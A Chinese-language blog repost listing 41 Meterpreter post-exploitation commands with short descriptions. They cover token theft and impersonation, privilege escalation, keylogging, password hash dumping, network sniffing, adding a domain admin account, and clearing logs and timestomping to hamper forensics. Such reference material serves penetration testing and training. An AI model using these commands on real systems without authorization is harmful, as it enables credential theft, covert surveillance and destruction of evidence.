• metasploit中meterpreter命令


      meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。

    常见的meterpreter命令

    1.  run scriptname       运行Meterpreter脚本,在scripts/meterpreter目录下可查看所有的脚本名。
    2.   sysinfo                    列出受控主机的系统信息。
    3.   ls                             列出目标主机的文件和文件夹信息。
    4.   use priv                    加载特权提升扩展模块,来扩展Meterpreter库。
    5.   ps                            显示所有运行进程以及关联的用户账号。
    6.   migrate PID               迁移到一个指定的进程ID(PID可通过ps从目标主机上获得)。
    7.   use incognito             加载incognito功能(用来盗窃目标主机的令牌或是假冒用户).
    8.   list_tokens -u            列出目标主机用户的可用令牌。
    9.   list_tokens -g            列出目标主机用户组的可用令牌。
    10.   impersonate_token DOMAIN_NAME\USERNAME             假冒目标主机上的可用令牌。
    11.   steal_token PID          盗窃给定进程的可用令牌并进行令牌假冒。
    12.   drop_token                停止假冒当前令牌。
    13.   getsystem                  通过各种攻击向量来提升系统用户权限。
    14.   shell                          以所有可用令牌来运行一个交互的shell。
    15.   execute -f cmd.exe -i  执行cmd.exe命令并进行交互。
    16.  execute -f cmd.exe -i -t 以所有可用的令牌来执行cmd命令。
    17.   execute -f cmd.exe -i -H -t  以所有可用的令牌来执行cmd命令并隐藏该进程。
    18.   rev2self                      回到控制目标主机的初始化用户账号下。
    19.   reg command              在目标主机注册表中进行交互,创建,删除,查询等操作。
    20.   setdesktop number      切换到另一个用户界面(该功能基于哪些用户已登录)。
    21.   screenshot                  对目标主机的屏幕进行截图。
    22.   upload file                   向目标主机上传文件
    23.   download file               从目标主机下载文件。
    24.   keyscan_start             针对远程目标主机开启键盘记录功能。
    25.   keyscan_dump            存储目标主机上捕获的键盘记录。
    26.   keyscan_stop              停止针对目标主机的键盘记录功能。
    27.   getprivs                      尽可能多的获取目标主机上的特权。
    28.   uictl enable keyboard/mouse     接管目标主机的键盘和鼠标。
    29.   background                 将你当前的Meterpreter shell转为后台执行。
    30.   hashdump                   导出目标主机中的口令哈希值。
    31.   use sniffer                   加载嗅探模块。
    32.   sniffer_interfaces          列出目标主机所有开放的网络接口。
    33.   sniffer_dump interfaceID pcapname        在目标主机上启动嗅探。
    34.   sniffer_stats interfaceID  获取正在实施嗅探网络接口的统计数据。
    35.   sniffer_start interfaceID packet-buffer  在目标主机上针对特定范围的数据包缓冲区启动嗅探。
    36.   sniffer_stop interfaceID 停止嗅探。
    37.   add_user username password -h ip   在远程目标主机上添加一个用户。
    38.   add_group_user "Domain Admins" username -h ip     将用户添加到目标主机的域管理员组中。
    39.   clearev                        清除目标主机上的日志记录。
    40.   timestomp                   修改文件属性,例如修改文件的创建时间(反取证调查)。
    41.   reboot                         重启目标主机。
  • 相关阅读:
    lodash源码分析之自减的两种形式
    lodash源码分析之NaN不是NaN
    lodash源码分析之Hash缓存
    lodash源码分析之compact中的遍历
    navigate15安装教程
    jmeter线程组调度器使用
    jmeter 注册选择文件编码格式有问题
    jmete插件下载
    jmeter linux 无gui模式分布式压测
    pycharm原码编辑界面快捷键
  • 原文地址:https://www.cnblogs.com/blacksunny/p/5265697.html
Copyright © 2020-2023  润新知